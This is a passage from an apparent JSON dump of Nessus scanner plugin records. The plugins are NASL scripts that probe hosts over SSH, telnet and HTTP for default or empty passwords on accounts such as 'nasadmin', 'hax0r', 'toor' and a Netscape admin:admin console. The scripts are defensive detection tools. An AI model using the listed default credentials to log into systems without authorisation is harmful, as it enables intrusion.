value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T14:58:15", "description": "The account 'nasadmin' on the remote host has the password 'nasadmin'. An attacker may leverage this to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2012-02-13T00:00:00", "type": "nessus", "title": "Default Password (nasadmin) for 'nasadmin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_NASADMIN_NASADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/57917", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"nasadmin\";\npassword = \"nasadmin\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57917);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (nasadmin) for 'nasadmin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'nasadmin' on the remote host has the password\n'nasadmin'. An attacker may leverage this to gain total control\nof the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"os_fingerprint.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (report_paranoia < 2)\n{\n os = get_kb_item(\"Host/OS\");\n if (!os || \"Celerra\" >!< os) audit(AUDIT_OS_NOT, \"EMC Celerra\");\n}\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:05:21", "description": "This host is running Netscape Enterprise Server. The administrative interface for this web server is using the default username and password of 'admin'. An attacker can use this to reconfigure the web server, cause a denial of service condition, or gain access to this host.", "cvss3": {"score": null, "vector": null}, "published": "2003-01-22T00:00:00", "type": "nessus", "title": "Netscape Enterprise Default Administrative Password", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:netscape:enterprise_server"], "id": "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "href": "https://www.tenable.com/plugins/nessus/11208", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Forrest Rae <forrest.rae@digitaldefense.net>\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11208);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Netscape Enterprise Default Administrative Password\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a default set of administrative\ncredentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"This host is running Netscape Enterprise Server. The administrative\ninterface for this web server is using the default username and\npassword of 'admin'. An attacker can use this to reconfigure the web\nserver, cause a denial of service condition, or gain access to this\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Please assign the web administration console a difficult-to-guess\npassword.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:TF/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:netscape:enterprise_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Digital Defense Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/www\", 8888);\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\ndebug = 0;\n\nports = add_port_in_list(list:get_kb_list(\"Services/www\"), port:8888);\n\nforeach port (ports)\n{\n\tif ( !get_port_state(port) ) continue;\n\tbanner = get_http_banner(port:port);\n\tif ( ! banner || (\"Netscape\" >!< banner && \"iPlanet\" >!< banner ) ) continue;\n\tsoc = http_open_socket(port);\n\n\tif (soc)\n\t{\n\n\t\t# HTTP auth = \"admin:admin\"\n\n\n\t\treq = http_get(item:\"/https-admserv/bin/index\", port:port);\n \t\treq = req - string(\"\\r\\n\\r\\n\");\n \t\treq = string(req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\");\n\n\n\t\tsend(socket:soc, data:req);\n\t\tbuf = http_recv(socket:soc);\n\t\thttp_close_socket(soc);\n\t\tif (isnull(buf)) continue;\n\n\t\tif(debug == 1) display(\"\\n\\n\", buf, \"\\n\\n\");\n\n\n\t\tif ((\"Web Server Administration Server\" >< buf) && (\"index?tabs\" >< buf))\n\t\t{\n\t\t\tsecurity_hole(port:port);\n\t\t}\n\t}\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:28", "description": "The account 'jack' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'jack' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_JACK.NASL", "href": "https://www.tenable.com/plugins/nessus/11249", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"jack\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11249);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'jack' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'jack' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:33", "description": "The account 'StoogR' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'StoogR' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_STOOGR.NASL", "href": "https://www.tenable.com/plugins/nessus/11259", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"StoogR\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11259);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'StoogR' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'StoogR' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:38", "description": "The account 'hax0r' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'hax0r' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_HAX0R.NASL", "href": "https://www.tenable.com/plugins/nessus/11253", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"hax0r\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11253);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'hax0r' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'hax0r' has no password set. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:38", "description": "The account 'tutor' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'tutor' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_TUTOR.NASL", "href": "https://www.tenable.com/plugins/nessus/11251", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"tutor\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11251);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Unpassworded 'tutor' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'tutor' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:43", "description": "The account 'wank' has the password 'wank'. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Default Password (wank) for 'wank' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_WANK_WANK.NASL", "href": "https://www.tenable.com/plugins/nessus/11260", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"wank\";\npassword = \"wank\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11260);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (wank) for 'wank' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'wank' has the password 'wank'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:05:44", "description": "The account 'toor' has no password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "type": "nessus", "title": "Unpassworded 'toor' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": 